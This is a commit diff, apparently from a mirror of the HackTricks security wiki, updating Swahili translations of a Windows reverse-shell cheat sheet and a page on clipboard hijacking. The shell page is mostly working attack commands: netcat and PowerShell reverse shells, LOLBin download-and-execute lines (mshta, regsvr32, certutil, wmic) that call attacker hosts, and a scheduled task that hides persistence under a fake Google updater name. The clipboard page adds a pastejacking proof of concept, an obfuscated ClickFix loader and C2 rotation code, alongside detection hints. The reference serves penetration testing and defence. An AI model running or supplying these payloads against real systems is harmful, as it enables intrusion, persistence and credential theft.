maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/reversing/common-api-used-in-malware.md', 'src/windows-

Browse Source
This commit is contained in:
Translator 2025-09-29 13:34:52 +00:00
parent 18dcc99bde
commit 0c0c2421b5
4 changed files with 475 additions and 360 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

129
src/generic-hacking/reverse-shells/windows.md
View File

@ -4,8 +4,8 @@
## Lolbas
The page [lolbas-project.github.io](https://lolbas-project.github.io/) ni ya Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni ya linux.\
Kwa wazi, **hakuna faili za SUID au ruhusa za sudo katika Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza kutumika (ku)fanya aina fulani za vitendo visivyotarajiwa kama **kutekeleza msimbo wa bahati nasibu.**
The page [lolbas-project.github.io](https://lolbas-project.github.io/) is for Windows like [https://gtfobins.github.io/](https://gtfobins.github.io/) is for linux.\
Kwa wazi, **there aren't SUID files or sudo privileges in Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza kutumiwa (au kutumika kinyemela) kufanya aina fulani ya vitendo visivyotarajiwa kama **execute arbitrary code.**
## NC
```bash
@ -13,7 +13,7 @@ nc.exe -e cmd.exe <Attacker_IP> <PORT>
```
## NCAT
mhasiri
madhulumiwa
```
ncat.exe <Attacker_IP> <PORT> -e "cmd.exe /c (cmd.exe 2>&1)"
#Encryption to bypass firewall
@ -27,7 +27,7 @@ ncat -l <PORT eg.443> --ssl
```
## SBD
**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaoweza kubebeka na salama**. Inafanya kazi kwenye mifumo ya Unix kama vile na Win32. Ikiwa na vipengele kama vile usimbuaji wenye nguvu, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat.
**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaobebeka na salama**. Inafanya kazi kwenye mifumo zinazofanana na Unix na Win32. Ikiwa na vipengele kama usimbaji imara, kuendesha programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa upya kwa kuendelea, sbd hutoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika kwa Netcat.
```bash
# Victims machine
sbd -l -p 4444 -e bash -v -n
@ -66,7 +66,7 @@ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -node
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
Mtu waathirika
Mwanaathiri
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -82,22 +82,22 @@ Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadStr
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
```
Mchakato unaofanya wito wa mtandao: **powershell.exe**\
Payload imeandikwa kwenye diski: **HAPANA** (_angalau sio mahali popote nilipoweza kupata kwa kutumia procmon !_ )
Payload imeandikwa kwenye diski: **NO** (_angalau hakuna sehemu niliyoweza kuipata nikipitia procmon !_)
```bash
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
```
Mchakato unaofanya wito wa mtandao: **svchost.exe**\
Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache**
Payload imeandikwa kwenye diski: **WebDAV client local cache**
**Mstari mmoja:**
```bash
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
```
**Pata maelezo zaidi kuhusu Shells tofauti za Powershell mwishoni mwa hati hii**
**Pata maelezo zaidi kuhusu Powershell Shells mbalimbali mwishoni mwa hati hii**
## Mshta
- [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [Tazama hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
```
@ -109,11 +109,11 @@ mshta http://webserver/payload.hta
```bash
mshta \\webdavserver\folder\payload.hta
```
#### **Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)**
#### **Mfano wa hta-psh reverse shell (tumia hta ili kupakua na kutekeleza PS backdoor)**
```xml
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
```
**Unaweza kupakua na kutekeleza kwa urahisi sana zombie ya Koadic ukitumia stager hta**
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager hta**
#### mfano wa hta
@ -165,9 +165,9 @@ Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given
## **Rundll32**
[**Mfano wa dll hello world**](https://github.com/carterjones/hello-world-dll)
[**Dll hello world example**](https://github.com/carterjones/hello-world-dll)
- [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
rundll32 \\webdavserver\folder\payload.dll,entrypoint
```
@ -175,11 +175,11 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
```bash
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
```
**Imegunduliwa na defender**
**Imegunduliwa na Defender**
**Rundll32 - sct**
[**Kutoka hapa**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
[**From here**](https://gist.github.com/Arno0x/e472f58f3f9c8c0c941c83c58f254e17)
```xml
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
@ -219,9 +219,29 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
```
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
```
**Imepatikana na mlinzi**
**Imegunduliwa na defender**
#### Regsvr32 export ya DLL yoyote kwa argument /i (udhibiti wa ufikiaji & kudumu)
Mbali na kupakia scriptlets za mbali (`scrobj.dll`), `regsvr32.exe` itapakia DLL ya ndani na kuita exports zake `DllRegisterServer`/`DllUnregisterServer`. Custom loaders mara nyingi hutumia hili vibaya kutekeleza code yoyote huku zikijichanganya na LOLBin iliyosainiwa. Vidokezo viwili vya tradecraft vinavyotumika kwa uhalisia:
- Gatekeeping argument: DLL inatoka isipokuwa switch maalum ipitishwe kwa `/i:<arg>`, kwa mfano `/i:--type=renderer` ili kuiga watoto wa renderer wa Chromium. Hii inapunguza utekelezaji usiotarajiwa na kuvuruga sandboxes.
- Persistence: panga `regsvr32` ili ikimbie DLL kwa mode mtulivu + ruhusa za juu na argument `/i` inayohitajika, ikijiweka kama updater task:
```powershell
Register-ScheduledTask \
-Action (New-ScheduledTaskAction -Execute "regsvr32" -Argument "/s /i:--type=renderer \"%APPDATA%\Microsoft\SystemCertificates\<name>.dll\"") \
-Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) \
-TaskName 'GoogleUpdaterTaskSystem196.6.2928.90.{FD10B0DF-...}' \
-TaskPath '\\GoogleSystem\\GoogleUpdater' \
-Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0 -DontStopOnIdleEnd) \
-RunLevel Highest
```
Tazama pia: variant ya ClickFix clipboardtoPowerShell inayoseti JS loader kisha baadaye inadumu kwa `regsvr32`.
{{#ref}}
../../generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
{{#endref}}
#### Regsvr32 -sct
[**Kutoka hapa**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1)
```html
@ -249,21 +269,21 @@ set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
```
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr**
**Unaweza kupakua na kutekeleza kwa urahisi sana zombie wa Koadic kwa kutumia stager regsvr**
## Certutil
- [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
Pakua B64dll, ikode na uitekeleze.
Pakua B64dll, uitafsiri kutoka Base64 (decode) na uitekeleze.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
```
Pakua B64exe, ibadilishe na uifanye kazi.
Pakua B64exe, ibadilishe kutoka Base64 kisha uitekeleze.
```bash
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
```
**Imegunduliwa na mlinzi**
**Imetambuliwa na Defender**
## **Cscript/Wscript**
```bash
@ -273,14 +293,14 @@ powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
```
**Imegunduliwa na mlinzi**
**Imegunduliwa na defender**
## PS-Bat
```bash
\\webdavserver\folder\batchfile.bat
```
Mchakato unaofanya wito wa mtandao: **svchost.exe**\
Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache**
Mchakato unaofanya mwito wa mtandao: **svchost.exe**\
Payload imeandikwa kwenye diski: **WebDAV client local cache**
```bash
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
@ -298,19 +318,19 @@ Mshambuliaji
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80
```
Victim:
Mwenye kuathiriwa:
```
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
```
**Imepatikana**
**Imegunduliwa**
## **Wmic**
- [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
wmic os get /format:"https://webserver/payload.xsl"
```
Example xsl file [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
Mfano wa faili ya xsl [from here](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7):
```xml
<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
@ -322,9 +342,9 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
</ms:script>
</stylesheet>
```
**Haitambuliwi**
**Haikutambuliwa**
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager wmic**
**Unaweza kupakua & kuendesha kwa urahisi sana Koadic zombie ukitumia stager wmic**
## Msbuild
@ -332,22 +352,22 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
```
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
```
Unaweza kutumia mbinu hii kupita Application Whitelisting na vizuizi vya Powershell.exe. Kwa kuwa utapewa shell ya PS.\
Pakua hii na uitekeleze: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
Unaweza kutumia mbinu hii kuvuka vikwazo vya Application Whitelisting na Powershell.exe. Utapata PS shell.\
Shusha tu hii na uitekeleze: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
```
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
```
**Haitagunduliwa**
**Haigunduliki**
## **CSC**
Kusanya msimbo wa C# kwenye mashine ya mwathirika.
Kusanya msimbo wa C# kwenye kompyuta ya mwathiriwa.
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
```
Unaweza kupakua shell ya msingi ya C# kutoka hapa: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
Unaweza kupakua reverse shell ya msingi ya C# kutoka hapa: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
**Haitambuliwi**
**Haijagunduliwa**
## **Regasm/Regsvc**
@ -355,13 +375,13 @@ Unaweza kupakua shell ya msingi ya C# kutoka hapa: [https://gist.github.com/Bank
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll
```
**Sijajaribu**
**Sijawahi kujaribu**
[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182)
## Odbcconf
- [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [From here](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
```bash
odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
```
@ -375,15 +395,15 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
Katika folda ya **Shells**, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, fanya nakala ya script na ongeza mwishoni mwa faili:
Katika folda ya **Shells**, kuna shell nyingi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, tengeneza nakala ya script na uambatishie mwishoni wa faili:
```
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
```
Anza kuhudumia skripti kwenye seva ya wavuti na uitekeleze upande wa mwathirika:
Anza kuhudumia script kwenye seva ya wavuti na uitekeleze kwa upande wa waathiriwa:
```
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
```
Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
Defender haikutambua kama msimbo hatari (bado, 3/04/2019).
**TODO: Angalia nishang shells nyingine**
@ -391,13 +411,13 @@ Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite upande wa mwathirika:
Pakua, anzisha web server, anzisha listener, na uitekeleze upande wa mwathiriwa:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
Defender haikutambui kama msimbo hatari (bado, 3/04/2019).
**Chaguzi zingine zinazotolewa na powercat:**
**Chaguzi nyingine zinazotolewa na powercat:**
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
```
@ -420,37 +440,37 @@ powercat -l -p 443 -i C:\inputfile -rep
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleze.
Tengeneza powershell launcher, uiweke kwenye faili, kisha upakue na uitekeleze.
```
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
```
**Imepatikana kama msimbo mbaya**
**Imegunduliwa kama malicious code**
### MSF-Unicorn
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
Unda toleo la powershell la backdoor ya metasploit ukitumia unicorn
Unda toleo la powershell la metasploit backdoor ukitumia unicorn
```
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
```
Anza msfconsole na rasilimali iliyoundwa:
Anzisha msfconsole kwa kutumia resource iliyoundwa:
```
msfconsole -r unicorn.rc
```
Anza seva ya wavuti inayotoa faili _powershell_attack.txt_ na utekeleze katika mwathiriwa:
Anzisha web server ikihudumia faili _powershell_attack.txt_ na uendeshe kwenye mashine ya mwathirika:
```
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
```
**Imedhamini kama msimbo mbaya**
**Imegunduliwa kama msimbo wa hatari**
## Zaidi
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)\
[PS>Attack](https://github.com/jaredhaight/PSAttack) Konsoli ya PS yenye baadhi ya moduli za PS zinazotumika kushambulia zilizopakiwa awali (cyphered)\
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX)
WinPWN](https://github.com/SecureThisShit/WinPwn) Konsoli ya PS yenye baadhi ya moduli za PS zinazotumika kushambulia na proxy detection (IEX)
## Marejeleo
## Marejeo
- [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
- [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
@ -459,5 +479,6 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya mod
- [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
- [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
- [Check Point Research Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/)
{{#include ../../banners/hacktricks-training.md}}

91
src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
View File

@ -2,15 +2,15 @@
{{#include ../../banners/hacktricks-training.md}}
> "Usiweke chochote ulichokosa mwenyewe." ushauri wa zamani lakini bado ni wa maana
> "Usibandike chochote usichokopia mwenyewe." ushauri wa zamani lakini bado sahihi
## Overview
## Muhtasari
Clipboard hijacking pia inajulikana kama *pastejacking* inatumia ukweli kwamba watumiaji mara kwa mara huiga na kuweka amri bila kuzichunguza. Tovuti mbaya (au muktadha wowote unaoweza kutumia JavaScript kama programu ya Electron au Desktop) inachanganya maandiko yanayodhibitiwa na mshambuliaji kwenye clipboard ya mfumo. Waathirika wanahimizwa, kawaida kwa maagizo ya uhandisi wa kijamii yaliyoundwa kwa uangalifu, kubonyeza **Win + R** (Run dialog), **Win + X** (Quick Access / PowerShell), au kufungua terminal na *kweka* yaliyomo kwenye clipboard, mara moja wakitekeleza amri zisizo na mpangilio.
Clipboard hijacking also known as *pastejacking* hunufaisha ukweli kwamba watumiaji mara kwa mara wanakopa-na-kubandika amri bila kuziangalia. Ukurasa wa wavuti wenye madhara (au muktadha wowote unaoweza kukimbia JavaScript kama Electron au Desktop application) unaweka kwa njia ya programu maandishi yanayotawaliwa na mshambuliaji kwenye clipboard ya mfumo. Waathiriwa wanahimizwa, kawaida kwa maagizo ya social-engineering yaliyotengenezwa kwa uangalifu, kubonyeza **Win + R** (Run dialog), **Win + X** (Quick Access / PowerShell), au kufungua terminal na *kubandika* yaliyomo kwenye clipboard, na mara moja kuendesha amri yoyote.
Kwa sababu **hakuna faili inayopakuliwa na hakuna kiambatisho kinachofunguliwa**, mbinu hii inapita karibu na udhibiti wote wa usalama wa barua pepe na maudhui ya wavuti yanayofuatilia viambatisho, macros au utekelezaji wa amri moja kwa moja. Shambulio hili kwa hivyo ni maarufu katika kampeni za phishing zinazotoa familia za malware za kawaida kama NetSupport RAT, Latrodectus loader au Lumma Stealer.
Kwa sababu **hakuna faili inapakuliwa na hakuna kiambatanisho kinachofunguliwa**, mbinu hii hupita vikwazo vingi vya usalama vya barua pepe na yaliyomo kwenye wavuti vinavyotiwa nadharia kusimamia viambatanisho, macros au utekelezaji wa amri moja kwa moja. Kwa hivyo shambulio hili ni maarufu katika kampeni za phishing zinazowasilisha familia za malware za kawaida kama NetSupport RAT, Latrodectus loader au Lumma Stealer.
## JavaScript Proof-of-Concept
## JavaScript Uthibitisho wa Dhana
```html
<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
<button id="fix" onclick="copyPayload()">Fix the error</button>
@ -22,15 +22,15 @@ navigator.clipboard.writeText(payload)
}
</script>
```
Older campaigns used `document.execCommand('copy')`, newer ones rely on the asynchronous **Clipboard API** (`navigator.clipboard.writeText`).
Kampeni za zamani zilitumia `document.execCommand('copy')`, zile za baadaye hutegemea asynchronous **Clipboard API** (`navigator.clipboard.writeText`).
## The ClickFix / ClearFake Flow
1. Mtumiaji anatembelea tovuti iliyo na makosa ya tahajia au iliyovunjwa (e.g. `docusign.sa[.]com`)
2. JavaScript ya **ClearFake** iliyowekwa inaita `unsecuredCopyToClipboard()` ambayo kimya kimya inahifadhi PowerShell one-liner iliyokuwa na Base64 katika clipboard.
3. Maelekezo ya HTML yanamwambia mwathirika: *“Bonyeza **Win + R**, bandika amri na bonyeza Enter kutatua tatizo.”*
4. `powershell.exe` inatekelezwa, ikipakua archive ambayo ina executable halali pamoja na DLL mbaya (classic DLL sideloading).
5. Loader inachambua hatua za ziada, inaingiza shellcode na kuanzisha kudumu (e.g. kazi iliyopangwa) hatimaye inatekeleza NetSupport RAT / Latrodectus / Lumma Stealer.
1. Mtumiaji anatembelea tovuti typosquatted au compromised (kwa mfano `docusign.sa[.]com`)
2. Injected **ClearFake** JavaScript inaita helper `unsecuredCopyToClipboard()` ambayo kimya kimya inaweka PowerShell one-liner iliyofichwa kwa Base64 kwenye clipboard.
3. Maelekezo ya HTML humuambia mwathiriwa: *“Bonyeza **Win + R**, bandika amri na bonyeza Enter ili kutatua tatizo.”*
4. `powershell.exe` inaendesha, ikipakua archive inayojumuisha executable halali pamoja na DLL mbaya (classic DLL sideloading).
5. Loader ina-decrypt hatua za ziada, inajaza shellcode na kusanidi persistence (kwa mfano scheduled task) hatimaye ikiwasha NetSupport RAT / Latrodectus / Lumma Stealer.
### Example NetSupport RAT Chain
```powershell
@ -40,42 +40,76 @@ Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
%TEMP%\f\jp2launcher.exe # Sideloads msvcp140.dll
```
* `jp2launcher.exe` (halali Java WebStart) inatafuta saraka yake kwa `msvcp140.dll`.
* DLL mbaya inatatua kwa dinamik API na **GetProcAddress**, inapakua binaries mbili (`data_3.bin`, `data_4.bin`) kupitia **curl.exe**, inazificha kwa kutumia ufunguo wa rolling XOR `"https://google.com/"`, inaingiza shellcode ya mwisho na inafungua **client32.exe** (NetSupport RAT) hadi `C:\ProgramData\SecurityCheck_v1\`.
* `jp2launcher.exe` (Java WebStart halali) inatafuta `msvcp140.dll` katika saraka yake.
* DLL hasidi inatatua APIs kwa wakati wa utekelezaji kwa kutumia **GetProcAddress**, inapakua binaries mbili (`data_3.bin`, `data_4.bin`) kupitia **curl.exe**, inazifumbua kwa kutumia ufunguo wa rolling XOR `"https://google.com/"`, inaingiza shellcode ya mwisho na inaifungua **client32.exe** (NetSupport RAT) kwa `C:\ProgramData\SecurityCheck_v1\`.
### Latrodectus Loader
```
powershell -nop -enc <Base64> # Cloud Identificator: 2031
```
1. Inapakua `la.txt` kwa kutumia **curl.exe**
2. Inatekeleza downloader ya JScript ndani ya **cscript.exe**
3. Inapata payload ya MSI → inatua `libcef.dll` pamoja na programu iliyosainiwa → DLL sideloading → shellcode → Latrodectus.
1. Inapakua `la.txt` kwa **curl.exe**
2. Inaendesha JScript downloader ndani ya **cscript.exe**
3. Inapata MSI payload → drops `libcef.dll` kando ya programu iliyosainiwa → DLL sideloading → shellcode → Latrodectus.
### Lumma Stealer kupitia MSHTA
```
mshta https://iplogger.co/xxxx =+\\xxx
```
The **mshta** call launches a hidden PowerShell script that retrieves `PartyContinued.exe`, extracts `Boat.pst` (CAB), reconstructs `AutoIt3.exe` through `extrac32` & file concatenation and finally runs an `.a3x` script which exfiltrates browser credentials to `sumeriavgv.digital`.
Kiito cha **mshta** huanzisha script ya PowerShell iliyofichwa ambayo inapata `PartyContinued.exe`, hutoa `Boat.pst` (CAB), inajenga upya `AutoIt3.exe` kupitia `extrac32` na kuunganisha faili, na hatimaye inaendesha script ya `.a3x` ambayo exfiltrates browser credentials to `sumeriavgv.digital`.
## Detection & Hunting
## ClickFix: Clipboard → PowerShell → JS eval → Startup LNK with rotating C2 (PureHVNC)
Blue-teams can combine clipboard, process-creation and registry telemetry to pinpoint pastejacking abuse:
Baadhi ya kampeni za ClickFix hupuuza downloads za faili kabisa na kuwashauri waathirika kubandika oneliner that fetches and executes JavaScript via WSH, persists it, and rotates C2 daily. Mfano wa mnyororo uliotazamwa:
```powershell
powershell -c "$j=$env:TEMP+'\a.js';sc $j 'a=new
ActiveXObject(\"MSXML2.XMLHTTP\");a.open(\"GET\",\"63381ba/kcilc.ellrafdlucolc//:sptth\".split(\"\").reverse().join(\"\"),0);a.send();eval(a.responseText);';wscript $j" Prеss Entеr
```
Sifa kuu
- URL iliyofichwa iliyopindishwa wakati wa runtime ili kuzuia uchunguzi wa kawaida.
- JavaScript hujiendeleza kupitia Startup LNK (WScript/CScript), na huchagua C2 kulingana na siku ya sasa ikiruhusu mzunguko wa domain wa haraka.
* Windows Registry: `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` keeps a history of **Win + R** commands look for unusual Base64 / obfuscated entries.
* Security Event ID **4688** (Process Creation) where `ParentImage` == `explorer.exe` and `NewProcessName` in { `powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe` }.
* Event ID **4663** for file creations under `%LocalAppData%\Microsoft\Windows\WinX\` or temporary folders right before the suspicious 4688 event.
* EDR clipboard sensors (if present) correlate `Clipboard Write` followed immediately by a new PowerShell process.
Sehemu ndogo ya JS inayotumika kuzungusha C2s kulingana na tarehe:
```js
function getURL() {
var C2_domain_list = ['stathub.quest','stategiq.quest','mktblend.monster','dsgnfwd.xyz','dndhub.xyz'];
var current_datetime = new Date().getTime();
var no_days = getDaysDiff(0, current_datetime);
return 'https://'
+ getListElement(C2_domain_list, no_days)
+ '/Y/?t=' + current_datetime
+ '&v=5&p=' + encodeURIComponent(user_name + '_' + pc_name + '_' + first_infection_datetime);
}
```
Hatua inayofuata kwa kawaida huweka loader ambayo inaanzisha persistence na kushusha RAT (mf., PureHVNC), mara nyingi ikifanya pinning ya TLS kwa hardcoded certificate na kugawanya traffic.
Detection ideas specific to this variant
- Process tree: `explorer.exe``powershell.exe -c``wscript.exe <temp>\a.js` (or `cscript.exe`).
- Startup artifacts: LNK in `%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup` invoking WScript/CScript with a JS path under `%TEMP%`/`%APPDATA%`.
- Registry/RunMRU and commandline telemetry containing `.split('').reverse().join('')` or `eval(a.responseText)`.
- Repeated `powershell -NoProfile -NonInteractive -Command -` with large stdin payloads to feed long scripts without long command lines.
- Scheduled Tasks that subsequently execute LOLBins such as `regsvr32 /s /i:--type=renderer "%APPDATA%\Microsoft\SystemCertificates\<name>.dll"` under an updaterlooking task/path (e.g., `\GoogleSystem\GoogleUpdater`).
